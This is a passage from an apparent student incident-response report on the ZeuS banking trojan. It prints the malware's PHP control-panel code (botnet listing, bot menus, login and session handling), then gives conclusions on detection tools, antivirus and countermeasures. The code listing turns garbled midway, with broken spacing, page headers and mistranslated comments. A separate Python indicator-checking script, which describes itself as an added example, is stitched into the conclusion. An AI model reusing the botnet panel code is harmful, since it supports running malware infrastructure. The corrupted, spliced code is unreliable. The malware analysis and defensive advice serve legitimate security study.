  $retVal = false;

  foreach ($list as $item)
  {
    if ($item[1] == 0)

    {
      $skip = 0;
      if (strcmp($item[0], 'OR') === 0) $q_cur = 0;
      else if (strcmp($item[0], 'AND') === 0) $q_cur = 1;
      else if (strcmp($item[0], 'NOT') === 0) $q_cur = 2;
      else $skip = 1;

      if ($skip == 0) { $q_prev = $q_cur; continue; }
    }

    //Compare.
    $r = preg_match($pcre_pre.strtr(preg_quote($item[0], '#'), array('\\*' => '.*', '\\?' => '.?')).$pcre_aft, $str);

    //Not sure of the logic.
    switch ($q_cur)
    {
      case 0: //OR
        if ($r > 0) $retVal = true;
        break;

      case 1: //AND
        if ($r > 0) break;
        return false;

      case 2: //NOT
        if ($r > 0) return false;
        break;
    }
  }

  return $retVal;
}

/*
  Convert a logical expression into the WHERE part of an SQL query.

  IN $exp    - string, expression.
  IN $column - string, column name.
  IN $cs     - bool, if true the match is case-sensitive, otherwise insensitive.
  IN $strong - bool, see the code.

  Return - string, query.
*/
function ExpToSQL($exp, $column, $cs, $strong)
{
  $exp = trim($exp);
  if ($exp == '' || $exp == '*') return '';
  $list = ExpToArray($exp);

  //Process the result.
  $query  = '';
  $q_addv = '';
  $q_prev = $q_cur = 'OR'; //Default conjunction between terms, matching the 0 (OR) default in MatchStringInExpString.

  foreach ($list as $item)
  {
    if ($item[1] == 0)
    {
      $skip = 0;

      if (strcmp($item[0], 'OR') === 0) { $q_cur = 'OR'; $q_addv = ''; }
      else if (strcmp($item[0], 'AND') === 0) { $q_cur = 'AND'; $q_addv = ''; }
      else if (strcmp($item[0], 'NOT') === 0) { $q_cur = 'AND'; $q_addv = 'NOT'; }
      else $skip = 1;

      if ($skip == 0)
      {
        if ($q_cur != $q_prev && !empty($query)) $query = '('.$query.')';
        $q_prev = $q_cur;
        continue;
      }

    }

    $s = str_replace(array('%', '_'), array('\\\\%', '\\\\_'), $item[0]);

    //Substitute the symbols *, ?.
    $len = strlen($s);
    for ($i = 0; $i < $len; $i++) if (($c = ord($s[$i])) == 0x2A || $c == 0x3F)
    {
      //Count the number of backslashes.
      $cc = 0;
      for ($k = $i - 1; $k >= 0 && ord($s[$k]) == 0x5C; $k--) $cc++;

      //Substitute.
      if ($cc % 2 == 0) $s[$i] = $c == 0x2A ? '%' : '_';
    }

    $s = stripslashes($s);
    if (!$strong) $s = '%'.$s.'%';

    $query .= (empty($query) ? '' : ' '.$q_cur.' ').$column.' '.$q_addv.' LIKE '.($cs ? 'BINARY ' : '').'\''.addslashes($s).'\'';
  }

  return '('.$query.')';
}

/*
  Checks that a path is safe (absence of the characters '\', '/', '\0').

  IN $str - string, the string to check.

  Return - bool, true if the path is safe, false if it is not.
*/
function SafePath($str)
{
  return (strpos($str, "/") === false && strpos($str, "\\") === false && strpos($str, "\0") === false);
}

/*
  Output the login form.

  IN $show_error - bool, whether to show the message about an incorrect username/password.
*/
function ShowLoginForm($show_error)
{
  $page = $show_error ? THEME_STRING_FORM_ERROR_1_BEGIN.'Bad user name or password.'.THEME_STRING_FORM_ERROR_1_END : '';
  $page .=
    str_replace(array('{NAME}', '{URL}', '{JS_EVENTS}'), array('login', QUERY_STRING_BLANK_HTML.'login', ''), THEME_FORMPOST_BEGIN).
    str_replace('{WIDTH}', 'auto', THEME_DIALOG_BEGIN).
    str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, 'Login'), THEME_DIALOG_TITLE).
    THEME_DIALOG_ROW_BEGIN.
    str_replace('{COLUMNS_COUNT}', 1, THEME_DIALOG_GROUP_BEGIN).
    THEME_DIALOG_ROW_BEGIN.
    str_replace('{TEXT}', 'User name:', THEME_DIALOG_ITEM_TEXT).
    str_replace(array('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array('', 'user', '255', '200px'), THEME_DIALOG_ITEM_INPUT_TEXT).
    THEME_DIALOG_ROW_END.
    THEME_DIALOG_ROW_BEGIN.
    str_replace('{TEXT}', 'Password:', THEME_DIALOG_ITEM_TEXT).
    str_replace(array('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array('', 'pass', '255', '200px'), THEME_DIALOG_ITEM_INPUT_PASS).
    THEME_DIALOG_ROW_END.
    THEME_DIALOG_ROW_BEGIN.
    THEME_DIALOG_ITEM_EMPTY.
    str_replace(array('{COLUMNS_COUNT}', '{VALUE}', '{NAME}', '{JS_EVENTS}', '{TEXT}'), array(1, 1, 'remember', '', 'Remember (MD5 cookies)'), THEME_DIALOG_ITEM_INPUT_CHECKBOX_2).
    THEME_DIALOG_ROW_END.
    THEME_DIALOG_GROUP_END.
    THEME_DIALOG_ROW_END.
    str_replace('{COLUMNS_COUNT}', 2, THEME_DIALOG_ACTIONLIST_BEGIN).

    str_replace(array('{TEXT}', '{JS_EVENTS}'), array('Submit', ''), THEME_DIALOG_ITEM_ACTION_SUBMIT).
    THEME_DIALOG_ACTIONLIST_END.
    THEME_DIALOG_END;

  ThemeSmall('login', $page.THEME_FORMPOST_END, 0, 0, 0);
}

/*
  Create a list of available botnets in THEME_DIALOG_ITEM_LISTBOX.

  IN $current_botnet - string, name of the current botnet, or '' if no botnet is selected.
  IN $adv_query      - additional data for the HTTP request when the botnet changes.

  Return - string, a ListBox named 'botnet' and a button to switch the botnet.
*/
function BotnetsToListBox($current_botnet, $adv_query)
{
  $adv_query = htmlentities_ex($adv_query);
  $botnets = str_replace(array('{NAME}', '{WIDTH}'), array('botnet', 'auto'), THEME_DIALOG_ITEM_LISTBOX_BEGIN).
             str_replace(array('{VALUE}', '{TEXT}'), array('', LNG_BOTNET_ALL), THEME_DIALOG_ITEM_LISTBOX_ITEM);

  if (($r = @mysql_query('SELECT DISTINCT botnet FROM botnet_list'))) while (($m = @mysql_fetch_row($r))) if ($m[0] != '')
  {
    $botnets .= str_replace(array('{VALUE}', '{TEXT}'),
                            array(htmlentities_ex(urlencode($m[0])), htmlentities_ex(mb_substr($m[0], 0, BOTNET_MAX_CHARS))),
                            strcmp($current_botnet, $m[0]) === 0 ? THEME_DIALOG_ITEM_LISTBOX_ITEM_CUR : THEME_DIALOG_ITEM_LISTBOX_ITEM);
  }

  $botnets .= THEME_DIALOG_ITEM_LISTBOX_END.' '.
              str_replace(array('{TEXT}', '{JS_EVENTS}'),
                          array(LNG_BOTNET_APPLY, 'onclick="var botnet = document.getElementById(\'botnet\'); window.location = \''.QUERY_STRING_HTML.$adv_query.'&botnet=\' + botnet.options[botnet.selectedIndex].value;"'),
                          THEME_DIALOG_ITEM_ACTION);
  return $botnets;
}

/*
  Create a table with the list of page numbers.

  IN $total_pages  - int, number of pages.
  IN $current_page - int, the current page.
  IN $js           - string, JavaScript for the onclick event, where {P} is the page number.

  Return - string, the list of pages.
*/
function ShowPageList($total_pages, $current_page, $js)
{
  $list = array();
  $visible_pages = 5; //Radius of visible pages.

  //Work out the visible pages.
  $min_visible = $current_page - $visible_pages;
  $max_visible = $current_page + $visible_pages;
  if ($min_visible < 1) $max_visible -= $min_visible - 1; //Add back the count that fell below 1.
  else if ($max_visible > $total_pages) $min_visible -= ($max_visible - $total_pages); //Reduce by the count that went past $total_pages.

  $q_min = false;
  $q_max = false;

  for ($i = 1; $i <= $total_pages; $i++)
  {
    //Current page.
    if ($i == $current_page) $list[] = array($i, 0);
    else
    {
      //Invisible page.
      if ($i != 1 && $i != $total_pages && ($i < $min_visible || $i > $max_visible))

      {
        if ($i < $min_visible && $q_min == false)
        {
          $list[] = array(0, 0);
          $q_min = true;
        }
        else if ($i > $max_visible && $q_max == false)
        {
          $list[] = array(0, 0);
          $q_max = true;
        }
      }
      //Visible page.
      else $list[] = array($i, str_replace('{P}', $i, $js));
    }
  }

  return ThemePageList($list,
                       $current_page > 1 ? str_replace('{P}', 1, $js) : 0,
                       $current_page > 1 ? str_replace('{P}', $current_page - 1, $js) : 0,
                       $current_page < $total_pages ? str_replace('{P}', $total_pages, $js) : 0,
                       $current_page < $total_pages ? str_replace('{P}', $current_page + 1, $js) : 0
                      );
}

/*
  Create a menu for JavaScript from $_BOT_MENU.

  IN $name - string, name of the menu.

  Return - string, a JavaScript variable with the menu contents.
*/
function GetBotJSMenu($name)
{
  global $_BOT_MENU;
  $output = '';
  $i = 0;

  foreach ($_BOT_MENU as $item)
  {
    if ($i++ != 0) $output .= ',';
    if ($item[0] === 0) $output .= '[0]';
    else $output .= '[\''.addjsslashes(htmlentities_ex($item[1])).'\', \''.addjsslashes(QUERY_SCRIPT_HTML.'?botsaction='.htmlentities_ex(urlencode($item[0])).'&bots[]=$0$').'\']';
  }

  return 'var '.$name.' = ['.$output.'];';
}

/*
  Create the popup menu for a bot.

  IN $botid    - string, the bot ID. Do not apply htmlentities_ex or urlencode to it.
  IN $menuname - string, name of the menu. Simply the name of the JavaScript variable created via GetBotJSMenu.

  Return - string, popup menu.
*/
function BotPopupMenu($botid, $menuname)
{
  if (!isset($GLOBALS['_next_bot_popupmenu__'])) $GLOBALS['_next_bot_popupmenu__'] = 100;
  return str_replace(array('{ID}', '{MENU_NAME}', '{BOTID_FOR_URL}', '{BOTID}'),
                     array($GLOBALS['_next_bot_popupmenu__']++, $menuname, htmlentities_ex(urlencode($botid)), htmlentities_ex($botid)),
                     THEME_POPUPMENU_BOT);
}

/*
  Create a sortable column header.

  IN $text   - string, column name.
  IN $col_id - int, column ID.
  IN $num    - bool, true if the column displays numbers, false if it displays text.

  Return - string, column.
*/
function WriteSortColumn($text, $col_id, $num)
{
  global $_SORT_ORDER, $_SORT_COLUMN_ID;

  if ($num) $theme = $_SORT_COLUMN_ID == $col_id ? ($_SORT_ORDER == 0 ? THEME_LIST_HEADER_R_SORT_CUR_ASC : THEME_LIST_HEADER_R_SORT_CUR_DESC) : THEME_LIST_HEADER_R_SORT;
  else $theme = $_SORT_COLUMN_ID == $col_id ? ($_SORT_ORDER == 0 ? THEME_LIST_HEADER_L_SORT_CUR_ASC : THEME_LIST_HEADER_L_SORT_CUR_DESC) : THEME_LIST_HEADER_L_SORT;

  return str_replace(array('{COLUMNS_COUNT}', '{URL}', '{JS_EVENTS}', '{TEXT}', '{WIDTH}'),
                     array(1, '#', 'onclick="return SetSortMode('.$col_id.', '.($_SORT_COLUMN_ID == $col_id ? ($_SORT_ORDER == 0 ? 1 : 0) : $_SORT_ORDER).')"', $text, 'auto'),
                     $theme);
}

/*
  JS code to change the sort order.

  IN $url - string, url.

  Return - string, js-code.
*/
function JSSetSortMode($url)
{
  return "function SetSortMode(mode, ord){window.location = '{$url}&smode=' + mode + '&sord=' + ord; return false;}\r\n";
}

/*
  JS code to initialize an XMLHttpRequest.

  IN $var - string, variable name for the object.

  Return - string, js-code.
*/
function JSXMLHttpRequest($var)
{
  return
    "try{{$var} = new ActiveXObject('Msxml2.XMLHTTP');}".
    "catch(e1)".
    "{".
      "try{{$var} = new ActiveXObject('Microsoft.XMLHTTP');}".
      "catch(e2){{$var} = false;}".
    "}".
    "if(!{$var} && typeof XMLHttpRequest != 'undefined'){{$var} = new XMLHttpRequest();}".
    "if(!{$var}) alert('ERROR: Failed to create XMLHttpRequest.');";
}

/*
  JS code for mass control of checkbox-type elements.

  IN $form - string, name of the form to process.
  IN $cb   - string, the main checkbox.
  IN $arr  - string, name of the dependent checkboxes.

  Return - string, js-code.
*/
function JSCheckAll($form, $cb, $arr)
{
  return
    "function CheckAll(){".
    "var bl = document.forms.namedItem('{$form}').elements;".

Page 132: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

"Var ns = bl.namedItem ('{$ cb}'). Checked;".

"For (var i = 0; i <bl.length; i + +) if (bl.item (i). Name == '{$ arr}') bl.item (i). Checked = ns;". "} \ R \ n";

}

/ *

Gets the sort order of the GET-request.

IN $ sm - array, list dosutpnyh sorts.

Return - string, URL of the current kotsovka stortirovki. * /

function AssocateSortMode ($ sm)

{ $ GLOBALS ['_SORT_COLUMN'] = $ sm [0] / / Column

$ GLOBALS ['_SORT_COLUMN_ID'] = 0; / / ID column.

$ GLOBALS ['_SORT_ORDER'] = 0, / / Direction, 0 = ASC, 1 = DESC

if (! empty ($ _GET ['smode']) & & is_numeric ($ _GET ['smode']))

{

if (isset ($ sm [$ _GET ['smode']]))

{

$ GLOBALS ['_SORT_COLUMN'] = $ sm [$ _GET ['smode']]; $ GLOBALS ['_SORT_COLUMN_ID'] = intval ($ _GET ['smode']);

}

}

if (! empty ($ _GET ['sord']) & & is_numeric ($ _GET ['sord']))$ GLOBALS [' _SORT_ORDER '] = $ _GET [' sord '] == 1? 1: 0;

if ($ GLOBALS ['_SORT_COLUMN_ID']! == 0 | | $ GLOBALS ['_SORT_ORDER']! == 0) return '& smode ='. $ GLOBALS

['_SORT_COLUMN_ID'].'& sord ='. $ GLOBALS [' _SORT_ORDER '];

return''; }

/ * Adding data to the current sort of form.

* /

function AddSortModeToForm () {

return str_replace (array ('{NAME}', '{VALUE}'), array ('smode', $ GLOBALS ['_SORT_COLUMN_ID']),

THEME_FORM_VALUE). str_replace (array ('{NAME}', '{VALUE}'), array ('sord', $ GLOBALS ['_SORT_ORDER']), THEME_FORM_VALUE);

}

/ *

Getting a list of all directories.

IN $ path - string, path to search.

Return - array, list diretory, or false otherwise.

* / function getdirs ($ path)

{

$ R = array (); if (($ dh = @ opendir ($ path)) === false) return false;

else

{

while (($ file = @ readdir ($ dh))! == false) if (strcmp ($ file, '.')! == 0 & & strcmp ($ file,'..')! == 0 & & @ is_dir ($ path .'/'.$ file))

$ r [] = $ file;

@ Closedir ($ dh); }

return $ r; }

/ * Deleting files and folders.

IN $ path - string, full path.

Page 133: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

Return - true - if the path is successfully removed; false - if an error occurs.

* /

function ClearPath ($ path) {

@ Chmod ($ path, 0777);

if (@ is_dir ($ path))

{

if (($ dh = @ opendir ($ path))! == false) {

while (($ file = readdir ($ dh))! == false) if (strcmp ($ file, '.')! == 0 & & strcmp ($ file,'..')! == 0)

{ if (! ClearPath ($ path .'/'.$ file)) return false;

}

@ Closedir ($ dh); }

if (! @ rmdir ($ path)) return false;

}

else if (is_file ($ path))

{

if (! @ unlink ($ path)) return false; }

return true; }

/ * Otimiziruet menu, removing items from it zapreshennye.

IN OUT $ menu - array, the menu for processing. IN $ allow_fsep - bool, keep the top separator.

* /

function OptimizeMenu (& $ menu, $ save_fsep) {

global $ _USER_DATA;

foreach ($ menu as $ key => $ item) foreach ($ item [2] as $ r) if (empty ($ _USER_DATA [$ r])) {unset ($ menu [$ key]); break;}

/ / Remove unnecessary separators. $ Sep = -1;

$ I = 0;

foreach ($ menu as $ key => $ item) {

if ($ item [0] === 0)

{ if ($ i == 0 & &! $ save_fsep) unset ($ menu [$ key]);

else if ($ sep! == -1) unset ($ menu [$ sep]);

$ Sep = $ key; }

else {

$ Sep = -1;

$ I + +; }

}

if ($ sep! == -1) unset ($ menu [$ sep]);

}

////////////////////////////////////////////////// /////////////////////////////

/ / Session management.

////////////////////////////////////////////////// /////////////////////////////

/ *

Capture Session * /

$ _SESSIONIN = 0;

function LockSession ()

Page 134: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

{

global $ _SESSIONIN; if ($ _SESSIONIN == 0)

{

@ Session_set_cookie_params (SESSION_LIVETIME, CP_HTTP_ROOT); @ Session_name (COOKIE_SESSION);

@ Session_start ();

} $ _SESSIONIN + +;

}

/ *

Exemption session

* / function UnlockSession ()

{

global $ _SESSIONIN; if ($ _SESSIONIN> 0 & & - $ _SESSIONIN == 0) session_write_close ();

}

/ *

Destroying session

* / function UnlockSessionAndDestroyAllCokies ()

{

global $ _SESSIONIN; $ _SESSIONIN = 0;

if (isset ($ _SESSION)) foreach ($ _SESSION as $ k => $ v) unset ($ _SESSION [$ k]);

@ Session_unset (); @ Session_destroy ();

@ Setcookie (COOKIE_SESSION,'', 0, CP_HTTP_ROOT); @ Setcookie (COOKIE_USER,'', 0, CP_HTTP_ROOT);

@ Setcookie (COOKIE_PASS,'', 0, CP_HTTP_ROOT);

} ?>

The answer is to use zse.exe to see the infection and fix it.

Conclusion

From the data collection of running the Zeus system configuration for approximately ten hours there was a noticeable amount of traffic from the impacted infected host to the web server. The goals were achieved to a level that is satisfactory to answer some basic questions of what Zeus does: how to detect what is going on within the infected host, which XP security-level configurations were impacted, how easy Zeus is to set up and use, and what countermeasures can be used to prevent infection.

From inspection of the Zeus "cp.php" and "gate.php" files, along with the "zse.exe" configuration setup file, you can see many of the data gathering methods and functions. These show evidence of data capturing and of data transfers being made from a host to a web server. From the Wireshark summary, packet transfer is occurring between the infected host and the web server. Those packets do not insert data into the web server's MySQL database; however, that is a minor detail which doesn't hamper the intent of this experiment. It is likely due to a missing PHP file or a required help file that would correct that missing link. In the "cp.php" and "gate.php" files it is not hard to see the relationships of the data repository actions that are supposed to take place on the web server.

In the IDA Pro results from the "bt.exe" and "zse.exe" files we see there are many functions it will be running on the infected host. Somewhere in the execution of "bt.exe" a spawn activity occurs to create another executable called "sdra64.exe". Also the Log (user.ds) and Config (local.ds) files were generated in a created directory named "lowsec", which assists the data collection process. The output of Procmon is very detailed and shows the actual changes that occur on the infected host. I experienced a continuous rebooting of the infected host. It would not enter back into the regular boot process; it would display a blue-screen error. This is shown in screenshots taken during the execution of the "bt.exe" attack on the infected host. The conclusions of the characteristics that Dell SecureWorks lists can be verified with the output files of InCtrl5 and Procmon. However, some claims they made I did not validate, such as FTP and POP accounts being stolen, as my system had neither configured.

The tools used to detect this complex Zeus malware program were selected at the beginning and during the examination of the infected host. The assignments over the coursework provided the necessary tools and techniques to properly assess the malware portion running on the infected host. The most useful one was InCtrl5. Procmon in conjunction with WinMerge "before" and "after" shots was very detailed but required a lot of time compared to InCtrl5, which was quick and pretty accurate in recovering all of the correct information as seen in the media articles. The given malware tool utility "zse.exe" will detect and clean the virus from the infected host. It will show a brief summary of the key files that are found on infected systems but not everything it causes. An appreciation of how complex Zeus is can be seen in the dissection of the assembly language code traced by IDA Pro. With more practice and an unlimited amount of time one could describe the code with more precision than what the other tools were able to report; however, it would be overkill for this experiment. IDA Pro would be a nice tool to master when doing this kind of exercise over and over in order to get more exact and refined details out of it. Wireshark showed the simple relationship between the infected host and the web server. The payloads were encrypted (assuming this since there wasn't any plaintext) with methods (Zeus uses RC4 encryption) within the "zse.exe" configuration and the web install "index.php". Both executions required the public key to process the automatic configurations. Wireshark shows the traffic type was mainly HTTP connections and many different ports were attempted. We could use some cryptography tools in this experiment and see if we could reveal the payloads since we do have the encryption mechanism and public key. We would need to discover the private key of the Zeus program. That process could take a lot of work and may not be possible or feasible.

The security levels of the XP systems were simple to configure and ranged from basic to complex. There was the standard build without a service pack and no AV, then a moderately protected XP, and then the highest possible hardened XP system. The security flaws were not found on the lowest baseline of XP with no AV installed. So something changed in the later builds of XP that have Service Pack 3 or higher to allow an open vulnerability related to what Zeus could penetrate through. All the systems with AV were capable of detecting and rejecting this version of Zeus; however, media literature shows that further developed Zeus platforms will elude AV. The mechanism which would allow this to be successful is based on the random encryption practices that Zeus has been implementing.

The first line of defense was AV. I did not anticipate that the AV would prevent the executable from running, but it does just that. It worked this time, but will it later? To improve upon this experiment I would like to set up a different trial set identical to this one but subtracting the known suspects that will refuse the infection based on having AV installed. The next layer of defense after AV is having full updates and removing unused services and closing unused ports. After that you can take another step and secure and restrict system-level scripts and executables that can operate at the system level. How well would the DoD system at low and high classification protection do against the Zeus attack without the AV installed?

The ease of use in my experience with this program rates as "difficult" to configure and use. Many software vendors that charge you for product support usually do so because their product is not as intuitive as running office suite products. I have experience with web development and know PHP and MySQL well enough to develop a working site that is useful. This type of project was not out of my field of expertise. It was hard to determine if you are missing a critical file. There weren't any help instructions to tweak possible web service configurations. There weren't any help files or forums to guide you through the process. I did not have an easy time locating a working copy of the software and did get a version that was not the original one or the latest one. You have to pay for it all and find out where to pay. The common files that I had were from a basic template or a modified experimental one; I can't be sure either way. There wasn't any MD5 hash to compare to see what I was supposed to be working with and whether my set of files had been altered or not. I have done the best with what I found. Getting it all going is difficult.

After you get over the stumps the rest of it is easy. It does have that kiddie script that builds the required functioning executables and has the self-configuring database along with the ready-to-go website server. The website worked but it was an empty shell since the data never populated. Did I have it configured right or wrong, or is there a time delay before the data collector sends it at "m" minutes or "h" hours later? I gave it almost ten hours and saw no data online from the command site.

The countermeasures to prevent this infection in this case scenario are simple. Use a good AV and keep the signature files up to date. However, future implementations of Zeus will defeat or have defeated AV. Other steps must be taken to protect the host from infection. Dell SecureWorks had some good advice on how to protect yourself from being a victim of Zeus stealing your banking information. SecureWorks suggests "businesses and home users carry out online banking and financial transactions on isolated workstations that are not used for general Internet activities, such as web browsing and reading email which could increase the risk of infection." For networks and home users the solutions will vary.

To combat malware you need an infrastructure with built-in security. There is a lot of sensitive data out there. How useful is the data if the data can't be viewed? It would be worthless and the effort would be wasted. I agree with the posting in the forum from our class related to the Germany citation[10] that would impose a fine on users that didn't secure their wireless routers if their router was used as the dummy network to commit a crime. Along similar lines, the more doors we close or secure, the less opportunity there is out there for a criminal to go through. Pretty Good Privacy (PGP)[11] is free and not easy to configure but works well to secure data files and emails. In advanced firewall appliances or software firewalls you should implement a blackhole list or a proxy that filters known websites and domains of Zeus and denies access to them. There is a supported list for Zeus called the "abuse.ch ZeuS removal list".[12] The proper security architectures need to be designed and used throughout the many networks to prevent the bots from spreading and the bots from collecting useful information.

10 http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/
   http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning
11 http://www.openpgp.org/
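A defender's triage check built from the indicators this report names (the "lowsec" directory with user.ds and local.ds, the spawned sdra64.exe, check-ins to gate.php, and a domain blocklist in the spirit of the abuse.ch list), written as an added example that is not part of the report or of any tool it uses; the blocklist entries, IP addresses and proxy log lines are constructed placeholders.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Host artifacts the report attributes to this ZeuS sample, relative to the
# Windows system directory: the "lowsec" folder with the user.ds log and
# local.ds config, and the spawned sdra64.exe.
HOST_ARTIFACTS = ("lowsec/user.ds", "lowsec/local.ds", "sdra64.exe")

# Constructed blocklist standing in for the abuse.ch ZeuS list; the names
# are placeholders, not real indicators.
BLOCKLIST = {"zeus-panel.example", "c2.example.net"}

# Common Log Format with an absolute request URL, as a forward proxy logs it.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" \d{3}'
)

def check_host_artifacts(system_dir):
    """Return the entries of HOST_ARTIFACTS that exist under system_dir."""
    base = Path(system_dir)
    return [a for a in HOST_ARTIFACTS if (base / a).exists()]

def check_proxy_log(lines, blocklist=BLOCKLIST):
    """Return one (src_ip, host, reason) tuple per suspicious request.

    A request is flagged when its destination host is on the blocklist, or
    when it is a POST to a gate.php path, the panel's collection endpoint
    seen in the report's traffic.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access record; skip rather than crash
        parts = urlsplit(m["url"])
        host = (parts.hostname or "").lower()
        if host in blocklist:
            hits.append((m["src"], host, "blocklisted host"))
        elif m["method"] == "POST" and parts.path.lower().endswith("/gate.php"):
            hits.append((m["src"], host, "POST to gate.php"))
    return hits

# Constructed proxy log (not captured traffic): two check-ins from one host,
# one benign request and one unparseable line.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2011:10:01:02 -0400] "POST http://zeus-panel.example/cp/gate.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2011:10:01:09 -0400] "POST http://203.0.113.9/zs/gate.php HTTP/1.1" 200 48',
    '10.0.0.7 - - [01/May/2011:10:02:00 -0400] "GET http://www.example.org/index.html HTTP/1.1" 200 8192',
    "garbage line that does not parse",
]

def demo_host_check():
    """Scan a constructed system directory holding two of the three artifacts."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "lowsec").mkdir()
        (Path(tmp) / "lowsec" / "user.ds").write_bytes(b"")
        (Path(tmp) / "sdra64.exe").write_bytes(b"")
        return check_host_artifacts(tmp)

if __name__ == "__main__":
    print("host artifacts found:", demo_host_check())
    for hit in check_proxy_log(SAMPLE_LOG):
        print("proxy hit:", hit)
```

On a real host, point check_host_artifacts at the Windows system directory; a hit on either check is a reason to pull the InCtrl5 or Procmon snapshot for that machine, not a verdict by itself.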

The current Microsoft OS is not encrypting things in the registry and is exposing a lot of system information. Operating systems should be designed to switch to an isolated read-only state for sensitive web browsing or banking, which would prevent storage from happening locally to the disk the OS resides on. Key-loggers and screenshots are taken by rogue malware programs that inject themselves into root system files. They reside there and are usually capturing and storing the user's interactive actions on the system. If the write permissions don't exist then those files can never be intercepted and executed upon to be sent out to a master server. We need a new Microsoft that hasn't had its source code sold to foreign countries and reverse engineered by hackers. The next generation of operating systems needs to have much greater security as part of the core of the product.

The most impact on prevention of viruses, malware, Trojans, and phishing schemes is proper network security personnel training. Home users may not get this annual requirement that corporations usually mandate. In addition to home users are those small businesses such as dental and doctor offices that don't employ security in their policies for network usage. Zeus works with user interaction for installation. When the user agrees to click yes and run to install, Zeus begins its process. Alternatively perhaps some phishing scheme is devised to trick users into entering their information, which activates the Zeus program. User training is important, but if the user is tricked and their files are encrypted to appropriate levels then the data will be useless to the malware.

12 https://zeustracker.abuse.ch

A solution today that prevents malware from the dummy user is to always use a Linux operating system booted from the CD-ROM option, which is read-only. You know for certain when you load the CD that your system root is not changed and not affected by malware, since malware can't be installed on the CD device. You know when you are browsing the web and banking that you don't have additional services in the background tracking your activity and sending it to a malware bot for further malicious activity.

References

DoD Gold Disk
http://www.disa.mil/services/ia.html

Retina
http://www.eeye.com/Retina

IDA Pro
http://www.hex-rays.com/idapro/

Wireshark
http://www.wireshark.org

Dell SecureWorks article on Zeus, published March 11, 2010
http://www.secureworks.com/research/threats/zeus/?threat=zeus

Utilities from Sysinternals Suite
http://technet.microsoft.com/en-us/sysinternals/bb842062

InCtrl5
http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/

WinMerge
http://winmerge.org/

verclsid.exe is an open MS vulnerability
http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx

abuse.ch ZeuS removal list
https://zeustracker.abuse.ch

Germany Wireless Fine
http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/
http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning

Pretty Good Privacy (PGP)
http://www.openpgp.org/